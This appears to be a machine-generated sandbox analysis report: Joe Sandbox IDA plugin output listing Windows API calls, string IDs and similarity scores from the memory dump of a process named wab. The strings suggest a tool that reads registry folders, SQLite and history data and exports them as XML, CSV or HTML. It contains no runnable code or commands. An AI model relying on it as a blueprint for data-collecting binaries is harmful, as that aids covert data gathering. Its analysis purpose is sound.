                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                          • API String ID: 3473751417-2880344631
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                          • API String ID: 2521778956-791839006
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _snwprintfwcscpy
                                                                                                                                                                                          • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                          • API String ID: 999028693-502967061
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memsetstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2350177629-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                          • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                          • API String ID: 2221118986-1606337402
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 265355444-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                                                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                                                                                            • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                            • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                                                                                                                                                          • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                          • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                          • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1973883786-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                                                                                            • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                          • API String ID: 2618321458-3614832568
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004185FC
                                                                                                                                                                                          • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@AttributesFilememset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 776155459-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                          • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2308052813-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                                                          • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PathTemp$??3@
                                                                                                                                                                                          • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                          • API String ID: 1589464350-1420421710
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                            • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                                                                                                                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                          • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                          • API String ID: 1775345501-2769808009
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                                          • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                                          • String ID: General
                                                                                                                                                                                          • API String ID: 999786162-26480598
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                          • String ID: Error$Error %d: %s
                                                                                                                                                                                          • API String ID: 313946961-1552265934
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                          • API String ID: 0-1953309616
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                          • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                          • API String ID: 3510742995-272990098
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                          • String ID: gj
                                                                                                                                                                                          • API String ID: 1297977491-4203073231
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                                                                                                                                                            • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                          • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2903831945-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4247780290-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                          • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                                                                                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1471605966-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                          • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                          • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                          • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                                                                                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                          • String ID: \StringFileInfo\
                                                                                                                                                                                          • API String ID: 102104167-2245444037
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$??3@
                                                                                                                                                                                          • String ID: g4@
                                                                                                                                                                                          • API String ID: 3314356048-2133833424
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memicmpwcslen
                                                                                                                                                                                          • String ID: @@@@$History
                                                                                                                                                                                          • API String ID: 1872909662-685208920
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                          • memset.MSVCRT ref: 00410112
                                                                                                                                                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                          • String ID: </%s>
                                                                                                                                                                                          • API String ID: 3400436232-259020660
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                          • String ID: caption
                                                                                                                                                                                          • API String ID: 1523050162-4135340389
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                          • String ID: MS Sans Serif
                                                                                                                                                                                          • API String ID: 210187428-168460110
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                          • String ID: edit
                                                                                                                                                                                          • API String ID: 2747424523-2167791130
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
